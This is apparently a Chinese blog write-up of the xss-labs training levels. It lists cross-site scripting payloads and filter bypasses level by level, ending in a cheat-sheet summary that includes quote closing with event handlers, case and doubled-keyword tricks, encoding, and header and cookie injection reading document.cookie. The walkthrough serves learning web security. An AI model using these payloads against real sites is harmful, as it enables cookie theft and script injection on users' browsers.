xss-labs实操

1.Level

无过滤法

2.Level2

“>闭合
“>&submit=搜索
通过观察发现alert里的引号没了,是不是被过滤了呢
因为如果该语句类似如下
<“Str”>,也就是说script在引号里面,那么是执行不了的,需要闭合操作,因此前面加个”>扔给前面的雨具语句
在这里插入图片描述

3.Level3

单引号闭合+事件函数
在这里插入图片描述

回显正常,但是没有执行,是什么原因呢,看下面这个发现是在input里
在这里插入图片描述

而input可以执行如下的事件函数
主要事件表:
在这里插入图片描述

这些都是可供参考的模式
因此构造payload:’ οnclick= alert(“123”)
出现了红色的onclick,前面用双引号不出现
在这里插入图片描述

但是发现alert前面被加了双引号,然后后面又有一个单引号和双引号
因此应该补一个单引号,所以
payload:’ οnclick=’ alert(“123”);
在这里插入图片描述

4.Level4

双引号闭合+事件函数
输入
发现返回了
在这里插入图片描述在这里插入图片描述

看这里也是用到了input,那么还是用事件函数
payload:" οnclick=alert(‘123’);"
在这里插入图片描述在这里插入图片描述

5.Level5

引号闭合+链接
输入
发现变成
在这里插入图片描述

说明script被过滤
在这里插入图片描述

还是input,还得用事件函数
输入" οnclick= "alert(‘123’);
在这里插入图片描述

o和n被插入了_,也就是说需要做关键字绕过
因此只能再寻找方法:"><a href=javascript:alert(‘xss’)>xss
发现这个方式没有过滤

在这里插入图片描述在这里插入图片描述

6.Level6

大小写绕过
在这里插入图片描述

script还是被过滤,不能用
在这里插入图片描述

onclicke也被过滤,不能用
在这里插入图片描述

href也是,那咋办呢
大小写绕过:"><a hRef=javascript:alert(‘xss’)>xss
在这里插入图片描述

7.Level7

多写绕过
这一关会直接删除script,会删除on
绕过方法很简单,多写就行:" oonnclick=alert(‘123’);"
即中间多写一个on,两边再接起来就行
在这里插入图片描述

8.Level8

unicode编码
href 和script都被过滤,大小写也没用
在这里插入图片描述

最后只能使用unicode编码
https://c.runoob.com/front-end/3602/
在这里插入图片描述

javascrIpt:alert('xss')
在这里插入图片描述在这里插入图片描述

9.Level9

unicode编码+//注释
或unicode编码+/**/注释
输入http://www.baidu.com,没有报错
在这里插入图片描述

输入:javascript:alert(‘xss’)//http://www.baidu.com
在这里插入图片描述

Unicode编码一下javascript:alert(‘xss’)
//表示注释后面的内容
javascript:alert(‘xss’)//http://
在这里插入图片描述在这里插入图片描述

10.Level10

隐藏标签赋值
需为t_sort赋值,需把type赋值为空,不然不显示
t_sort=123" type=“” οnclick="alert(‘xss’)
在这里插入图片描述在这里插入图片描述

11.Level11

手动编辑赋值
在这里插入图片描述

这一关也存在隐藏标签
t_link=123" type=“” οnclick=“alert(‘xss’)
t_history=123” type=“” οnclick=“alert(‘xss’)
t_sort=123” type=“” οnclick=“alert(‘xss’)
t_ref=123” type=“” οnclick="alert(‘xss’)
逐个试完还是只有t_sort有变化,但type被写死了
在这里插入图片描述

既然语句写不进去,那么手动编辑就好了,强制给type赋值

在这里插入图片描述在这里插入图片描述

referer注入
方法二是使用bp抓包通过修改入口referer链接实现
在这里插入图片描述在这里插入图片描述在这里插入图片描述

12.Level12

和上一关一模一样的做法
在这里插入图片描述在这里插入图片描述

12关方法二
UA头注入
在这里插入图片描述在这里插入图片描述

13.Level13

Cookie注入
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

14关程序有误,链接点不进去,好像是个上传页面,要上传一个有exif漏洞的图片,算了,知道咋回事就行

14.xss绕过总结

1)测试需观察点

浏览器左下角查看器,查找注入点所在代码
burp响应包referer/UA/cookie三处位置看是否在提交包中有对应信息

2)无过滤法

3)">闭合

">

4)单引号闭合+事件函数

’ οnclick=’ alert(“123”);

5)双引号闭合+事件函数

" οnclick=alert(‘123’);"

6)引号闭合+链接

"><a href=javascript:alert(‘xss’)>xss

7)大小写绕过

"><a hRef=javascript:alert(‘xss’)>xss

8)多写绕过

" oonnclick=alert(‘123’);"

9)unicode编码

javascript:alert(‘xss’)
javascrIpt:alert(‘xss’)

10)unicode编码+//注释

javascript:alert(‘xss’)//http://www.baidu.com
javascript:alert(‘xss’)//http://

11)隐藏标签赋值

t_sort=123" type=“” οnclick="alert(‘xss’)

12)referer注入

“ type=”” οnclick=”alert(document.cookie)

13)UA头注入

“ type=”” οnclick=”alert(document.cookie)

14)Cookie注入

“ οnclick="alert(‘xss’) type=”

15)`替换()

在这里插入图片描述

16)实体编码绕过

https://www.qqxiuzi.cn/bianma/zifushiti.php ![在这里插入图片描述](https://img-blog.csdnimg.cn/cc64ab2427a9467c908905a947f9aaed.png)

17)–!>注释绕过

注释方式有两种:

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值